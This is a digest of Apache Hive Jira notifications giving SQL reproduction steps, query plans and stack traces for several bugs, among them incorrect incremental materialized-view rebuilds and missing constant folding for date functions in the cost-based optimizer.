[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Description: 
h1. Summary

The incremental rebuild plan and its execution output are incorrect when one 
side of the join has inserted rows whose join keys match rows that the other 
side has deleted, or vice versa (note the order).

The argument is that tuples that were never present simultaneously should not 
interact with one another, i.e., one table's inserts should not join with the 
other table's deletes.
h1. Related Test Case

The bug was discovered while reproducing the test case:

??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??
h1. Steps to Reproduce the Issue
 # Configurations:
{code:sql}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set hive.materializedview.rewriting=true;{code}
 # 
{code:sql}
create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}
 # 
{code:sql}
insert into cmv_basetable_n6 values
(1, 'alfred', 10.30, 2),
(1, 'charlie', 20.30, 2); {code}
 # 
{code:sql}
create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) 
stored as orc TBLPROPERTIES ('transactional'='true'); {code}
 # 
{code:sql}
insert into cmv_basetable_2_n3 values
(1, 'bob', 30.30, 2),
(1, 'bonnie', 40.30, 2);{code}
 # 
{code:sql}
CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') 
AS
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
 # 
{code:sql}
show tables; {code}
!截图.PNG!
 # Select tuples, including deleted rows and the virtual columns, from the MV 
and the source tables. We can see that the MV is correctly built upon creation:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图1.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图2.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图3.PNG!
 # Now insert a row into the LHS source table and delete a row from the RHS 
source table:
{code:sql}
insert into cmv_basetable_n6 values
(1, 'kevin', 50.30, 2);

DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}
 # Select again to see what happened:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
!截图4.PNG!
 # 
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
!截图5.PNG!
 # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV; the 
plan is already incorrect:
{code:sql}
EXPLAIN CBO
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
!截图6.PNG!
 # Rebuild the MV and observe the (incorrect) results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;

SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
!截图7.PNG!
 # Run the MV definition directly; it outputs incorrect results because the MV 
is enabled for MV-based query rewrite, i.e., the following query returns 
whatever is currently stored in the MV:
{code:sql}
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0; {code}
!截图8.PNG!
 # Disable MV-based query rewrite for the MV and re-run the definition; this 
now gives the correct results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;

SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
!截图9.PNG!

h1. Note

This issue is also seen with the inserts/deletes incurred by UPDATE statements.
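For instance (a hypothetical variation on the repro above, not part of the 
original test), a single UPDATE on the RHS produces both a delete event and an 
insert event under ACID, so it can create the same never-coexisting 
insert/delete pairs without any explicit DELETE:
{code:sql}
-- Rewrites the 'bob' row as a delete of the old version plus an insert of the
-- new one; the LHS's inserted rows must likewise never join the deleted half.
UPDATE cmv_basetable_2_n3 SET c = 60.30 WHERE b = 'bob';
{code}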


[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Attachment: 截图9.PNG

> Incremental rebuild goes wrong when inserts and deletes overlap between the 
> source tables
> -
>
> Key: HIVE-27924
> URL: https://issues.apache.org/jira/browse/HIVE-27924
> Project: Hive
>  Issue Type: Bug
>  Components: Materialized views
>Affects Versions: 4.0.0-beta-1
> Environment: * Docker version : 19.03.6
>  * Hive version : 4.0.0-beta-1
>  * Driver version : Hive JDBC (4.0.0-beta-1)
>  * Beeline version : 4.0.0-beta-1
>Reporter: Wenhao Li
>Priority: Critical
>  Labels: bug, hive, materializedviews
> Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
> 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
>

[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Attachment: (was: 截图9.PNG)



[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Wenhao Li updated HIVE-27924:
-
Environment: 
* Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1

  was:
h1. Software Env.
 * Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1



[jira] [Commented] (HIVE-22077) Inserting overwrite partitions clause does not clean directories while partitions' info is not stored in metadata

2023-11-30 Thread Kiran Velumuri (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-22077?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791918#comment-17791918
 ] 

Kiran Velumuri commented on HIVE-22077:
---

[~Bone An] I see that this issue has been inactive for a long time. In case you 
are not working on this, can I pick this up? Thanks.

> Inserting overwrite partitions clause does not clean directories while 
> partitions' info is not stored in metadata
> -
>
> Key: HIVE-22077
> URL: https://issues.apache.org/jira/browse/HIVE-22077
> Project: Hive
>  Issue Type: Bug
>  Components: Hive
>Affects Versions: 1.1.1, 2.3.4, 4.0.0
>Reporter: Hui An
>Assignee: Hui An
>Priority: Major
> Attachments: HIVE-22077.patch.1
>
>
> Inserting overwrite into static partitions may not clean the related HDFS 
> location if the partitions' info is not stored in the metastore.
> Steps to reproduce this issue:
> 
> 1. Create a managed table :
> 
> {code:sql}
>  CREATE TABLE `test`(   
>`id` string) 
>  PARTITIONED BY (   
>`dayno` string)  
>  ROW FORMAT SERDE   
>'org.apache.hadoop.hive.ql.io.orc.OrcSerde'  
>  STORED AS INPUTFORMAT  
>'org.apache.hadoop.hive.ql.io.orc.OrcInputFormat'  
>  OUTPUTFORMAT   
>'org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat' 
>  LOCATION   
>'hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test' 
>  TBLPROPERTIES (
>'transient_lastDdlTime'='1564731656')   
> {code}
> 
> 2. Create partition's directory and put some data in it
> 
> {code:java}
> hdfs dfs -mkdir 
> hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> hdfs dfs -put test.data 
> hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> {code}
> 
> 3. Insert overwrite partition dayno=20190802
> 
> {code:sql}
> INSERT OVERWRITE TABLE test PARTITION(dayno='20190802')
> SELECT "some value";
> {code}
> 
> 4. We can see that test.data under the partition directory is not deleted.
> 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables

2023-11-30 Thread Wenhao Li (Jira)
Wenhao Li created HIVE-27924:


 Summary: Incremental rebuild goes wrong when inserts and deletes 
overlap between the source tables
 Key: HIVE-27924
 URL: https://issues.apache.org/jira/browse/HIVE-27924
 Project: Hive
  Issue Type: Bug
  Components: Materialized views
Affects Versions: 4.0.0-beta-1
 Environment: h1. Software Env.
 * Docker version : 19.03.6
 * Hive version : 4.0.0-beta-1
 * Driver version : Hive JDBC (4.0.0-beta-1)
 * Beeline version : 4.0.0-beta-1
Reporter: Wenhao Li
 Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 
截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-21660) Wrong result when union all and later view with explode is used

2023-11-30 Thread Chunhui Yang (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-21660?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791864#comment-17791864
 ] 

Chunhui Yang commented on HIVE-21660:
-

I am using Hive 2.3.9 running on MapReduce rather than Tez, and I also face 
this issue. Can I edit GenTezUtils.java to fix this bug?

> Wrong result when union all and later view with explode is used
> ---
>
> Key: HIVE-21660
> URL: https://issues.apache.org/jira/browse/HIVE-21660
> Project: Hive
>  Issue Type: Bug
>  Components: Physical Optimizer
>Affects Versions: 3.1.1
>Reporter: Ganesha Shreedhara
>Assignee: Ganesha Shreedhara
>Priority: Major
> Fix For: 4.0.0-alpha-1
>
> Attachments: HIVE-21660.1.patch, HIVE-21660.2.patch, HIVE-21660.patch
>
>
> There is a data loss when the data is inserted to a partitioned table using 
> union all and lateral view with explode. 
>  
> *Steps to reproduce:*
>  
> {code:java}
> create table t1 (id int, dt string);
> insert into t1 values (2, '2019-04-01');
> create table t2 (id int, dates array<string>);
> insert into t2 select 1 as id, array('2019-01-01','2019-01-02','2019-01-03') 
> as dates;
> create table dst (id int) partitioned by (dt string);
> set hive.exec.dynamic.partition.mode=nonstrict;
> set hive.exec.dynamic.partition=true;
> insert overwrite table dst partition (dt)
> select t.id, t.dt from (
> select id, dt from t1
> union all
> select id, dts as dt from t2 tt2 lateral view explode(tt2.dates) dd as dts ) 
> t;
> select * from dst;
> {code}
>  
>  
> *Actual Result:*
> {code:java}
> +-----+-------------+
> | 2   | 2019-04-01  |
> +-----+-------------+{code}
>  
> *Expected Result* (Run only the select part from the above insert query)*:* 
> {code:java}
> +-----+-------------+
> | 2   | 2019-04-01  |
> | 1   | 2019-01-01  |
> | 1   | 2019-01-02  |
> | 1   | 2019-01-03  |
> +-----+-------------+{code}
>  
> The data retrieved from the second table using union all and lateral view 
> with explode is missing.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by

2023-11-30 Thread Riju Trivedi (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27923?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Riju Trivedi updated HIVE-27923:

Description: 
Query fails with an 'Invalid column reference' error if the column in the 
ORDER BY clause is not referenced in the same way as in the GROUP BY clause. 
For example, the first two queries below compile correctly, but the third one 
fails.
{code:sql}
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`, COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`order_by_test`.`result_date`) DESC;
---Successful
CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS 
`process_date`, COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`result_date`)
ORDER BY to_date(`result_date`) DESC;
--Successful
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`, COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`result_date`) DESC;
--Failure
{code}
Both column-name and alias references should be supported in the ORDER BY 
clause.
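As an illustration of the alias path (a hypothetical workaround sketch, not 
taken from this ticket), ordering by the select alias keeps the ORDER BY 
expression identical to an output column and sidesteps the failing resolution:
{code:sql}
-- Hypothetical workaround: reference the alias `process_date` instead of
-- re-deriving the expression from the unqualified column name.
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`)
AS `process_date`, COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY `process_date` DESC;
{code}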

 


> Query fails with SemanticException if column referenced with name in ORDER by 
>  
> ---
>
> Key: HIVE-27923
> URL: https://issues.apache.org/jira/browse/HIVE-27923
> Project: Hive
>  Issue Type: Bug
>  Components: Logical Optimizer
>Reporter: Riju Trivedi
>Priority: Major
>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by

2023-11-30 Thread Riju Trivedi (Jira)
Riju Trivedi created HIVE-27923:
---

 Summary: Query fails with SemanticException if column referenced 
with name in ORDER by  
 Key: HIVE-27923
 URL: https://issues.apache.org/jira/browse/HIVE-27923
 Project: Hive
  Issue Type: Bug
  Components: Logical Optimizer
Reporter: Riju Trivedi





--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27922) Backport HMS client changes from HIVE-18755

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27922?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27922:
--
Labels: pull-request-available  (was: )

> Backport HMS client changes from HIVE-18755
> ---
>
> Key: HIVE-27922
> URL: https://issues.apache.org/jira/browse/HIVE-27922
> Project: Hive
>  Issue Type: Improvement
>Reporter: Chao Sun
>Priority: Major
>  Labels: pull-request-available
>
> This is a follow-up on HIVE-27868 to backport HMS client changes related to 
> the catalog support.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27922) Backport HMS client changes from HIVE-18755

2023-11-30 Thread Chao Sun (Jira)
Chao Sun created HIVE-27922:
---

 Summary: Backport HMS client changes from HIVE-18755
 Key: HIVE-27922
 URL: https://issues.apache.org/jira/browse/HIVE-27922
 Project: Hive
  Issue Type: Improvement
Reporter: Chao Sun


This is a follow-up on HIVE-27868 to backport HMS client changes related to the 
catalog support.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-27868) Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog in HMS 3+

2023-11-30 Thread Chao Sun (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27868?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chao Sun resolved HIVE-27868.
-
Fix Version/s: 2.3.10
 Assignee: Chao Sun
   Resolution: Fixed

> Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog 
> in HMS 3+
> ---
>
> Key: HIVE-27868
> URL: https://issues.apache.org/jira/browse/HIVE-27868
> Project: Hive
>  Issue Type: Improvement
>Reporter: Chao Sun
>Assignee: Chao Sun
>Priority: Major
>  Labels: pull-request-available
> Fix For: 2.3.10
>
>
> HIVE-18755 introduced the concept of a catalog, which adds another level of 
> namespace on top of databases and tables. Given that HMS in Hive 3.x already 
> has this feature, and that the Hive 2.3 client is commonly used to talk to 
> these metastores through frameworks such as Spark, this JIRA proposes to 
> backport a subset of the feature so that the Hive 2.3 client can specify the 
> catalog to read from when talking to 3.x metastores.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Component/s: Hive

> Prepare for Hive 4.0.0 Release
> --
>
> Key: HIVE-27921
> URL: https://issues.apache.org/jira/browse/HIVE-27921
> Project: Hive
>  Issue Type: Task
>  Components: Hive
>Affects Versions: 4.0.0
>Reporter: Denys Kuzmenko
>Priority: Major
>
> This is an umbrella Jira to track the activity around the Hive 4.0.0 
> release. 
> *Please note that this is an open forum and every input from the community 
> is welcome.*



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Description: 
This is an umbrella Jira to track the activity around the Hive 4.0.0 release. 

*Please note that this is an open forum and every input from the community is 
welcome.*




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Affects Version/s: 4.0.0




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Issue Type: Task  (was: Improvement)




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)
Denys Kuzmenko created HIVE-27921:
-

 Summary: Prepare for Hive 4.0.0 Release
 Key: HIVE-27921
 URL: https://issues.apache.org/jira/browse/HIVE-27921
 Project: Hive
  Issue Type: Improvement
Reporter: Denys Kuzmenko






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-26630) Introduce copy-on-write DML implementations for Iceberg tables

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-26630?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko resolved HIVE-26630.
---
Fix Version/s: 4.0.0
 Assignee: Denys Kuzmenko  (was: Ayush Saxena)
   Resolution: Fixed

> Introduce copy-on-write DML implementations for Iceberg tables
> --
>
> Key: HIVE-26630
> URL: https://issues.apache.org/jira/browse/HIVE-26630
> Project: Hive
>  Issue Type: Improvement
>Reporter: Ádám Szita
>Assignee: Denys Kuzmenko
>Priority: Major
> Fix For: 4.0.0
>
>
> Hive currently supports only the merge-on-read approach when doing 
> delete/update/merge operations on Iceberg tables. From a performance point 
> of view, this has an advantage on the write side and a disadvantage on the 
> read side.
> We should create a copy-on-write implementation for these operations, where 
> the pros and cons are inverted, which might suit certain use cases better.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27920) Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function

2023-11-30 Thread Stamatis Zampetakis (Jira)
Stamatis Zampetakis created HIVE-27920:
--

 Summary: Failed to generate OPTIMIZED SQL when running EXPLAIN 
EXTENDED on query with TO_DATE function
 Key: HIVE-27920
 URL: https://issues.apache.org/jira/browse/HIVE-27920
 Project: Hive
  Issue Type: Bug
  Components: CBO
Affects Versions: 4.0.0-beta-1
Reporter: Stamatis Zampetakis
Assignee: Stamatis Zampetakis


The problem can be reproduced in current master using the following scenario.
{code:sql}
CREATE TABLE TBL (STRING_DATE STRING);
EXPLAIN EXTENDED SELECT TO_DATE(STRING_DATE) FROM TBL;
{code}

The OPTIMIZED SQL entry is missing from the output of the EXPLAIN.
{noformat}
STAGE DEPENDENCIES:
  Stage-0 is a root stage

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: tbl
  GatherStats: false
  Select Operator
expressions: to_date(CAST( string_date AS TIMESTAMP)) (type: date)
outputColumnNames: _col0
ListSink
{noformat}

The OPTIMIZED SQL is missing because the conversion from the CBO plan 
(RelNode) to SQL fails with the following stacktrace.
{noformat}
2023-11-30T07:11:34,486  WARN [ebc7347a-5ea2-49dc-88c8-61b25804e066 main] 
parse.CalcitePlanner: Rel2SQL Rewrite threw error
java.lang.UnsupportedOperationException: class 
org.apache.calcite.sql.SqlSyntax$6: SPECIAL
at org.apache.calcite.util.Util.needToImplement(Util.java:975) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlSyntax$6.unparse(SqlSyntax.java:116) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlOperator.unparse(SqlOperator.java:329) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:108)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlAsOperator.unparse(SqlAsOperator.java:76) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list2(SqlPrettyWriter.java:1291)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list(SqlPrettyWriter.java:1271)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter.list(SqlPrettyWriter.java:1068) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.SqlSelectOperator.unparse(SqlSelectOperator.java:164) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlSelect.unparse(SqlSelect.java:246) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:152) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:174) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:183) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.getOptimizedSql(CalcitePlanner.java:1367)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.genOPTree(CalcitePlanner.java:660)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.SemanticAnalyzer.analyzeInternal(SemanticAnalyzer.java:13113)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.analyzeInternal(CalcitePlanner.java:465)
 

[jira] [Created] (HIVE-27919) Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB

2023-11-30 Thread Stamatis Zampetakis (Jira)
Stamatis Zampetakis created HIVE-27919:
--

 Summary: Constant reduction in CBO does not work for 
FROM_UNIXTIME, DATE_ADD, DATE_SUB
 Key: HIVE-27919
 URL: https://issues.apache.org/jira/browse/HIVE-27919
 Project: Hive
  Issue Type: Improvement
  Components: CBO
Affects Versions: 4.0.0-beta-1
Reporter: Stamatis Zampetakis
Assignee: Stamatis Zampetakis


Constant reduction (aka. constant folding) does not work in CBO for 
FROM_UNIXTIME, DATE_ADD, and DATE_SUB functions.

Below, we outline the results of EXPLAIN CBO and plain EXPLAIN using some 
trivial constant inputs. Notice that constant reduction is absent from the CBO 
plan but is applied later by the physical optimizer.

{code:sql}
SELECT FROM_UNIXTIME(1701088643)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[FROM_UNIXTIME(1701088643)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: '2023-11-27 04:37:23' (type: string)
outputColumnNames: _col0
ListSink
{noformat}

{code:sql}
SELECT DATE_ADD('2023-01-01', 1)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[DATE_ADD(_UTF-16LE'2023-01-01':VARCHAR(2147483647) 
CHARACTER SET "UTF-16LE", 1)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: DATE'2023-01-02' (type: date)
outputColumnNames: _col0
ListSink
{noformat}

{code:sql}
SELECT DATE_SUB('2023-01-01', 1)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[DATE_SUB(_UTF-16LE'2023-01-01':VARCHAR(2147483647) 
CHARACTER SET "UTF-16LE", 1)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: DATE'2022-12-31' (type: date)
outputColumnNames: _col0
ListSink
{noformat}
The reason is that all of these functions currently extend 
{{SqlAbstractTimeFunction}}, which is declared as a dynamic function and 
therefore prevents constant folding by default.
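A minimal sketch of one possible fix direction (my assumption, not the 
committed patch): registering these operators as a plain {{SqlFunction}} that 
reports {{isDynamicFunction() == false}} would let constant reduction fold 
them, since Calcite's reduction rules skip calls whose operator claims to be 
dynamic. The constructor arguments below are illustrative guesses, not Hive's 
actual registration.
{code:java}
import org.apache.calcite.sql.SqlFunction;
import org.apache.calcite.sql.SqlFunctionCategory;
import org.apache.calcite.sql.SqlKind;
import org.apache.calcite.sql.type.OperandTypes;
import org.apache.calcite.sql.type.ReturnTypes;

public class SqlFromUnixTimeFunction extends SqlFunction {
  public SqlFromUnixTimeFunction() {
    super("FROM_UNIXTIME", SqlKind.OTHER_FUNCTION,
        ReturnTypes.VARCHAR_2000,      // result is a formatted string
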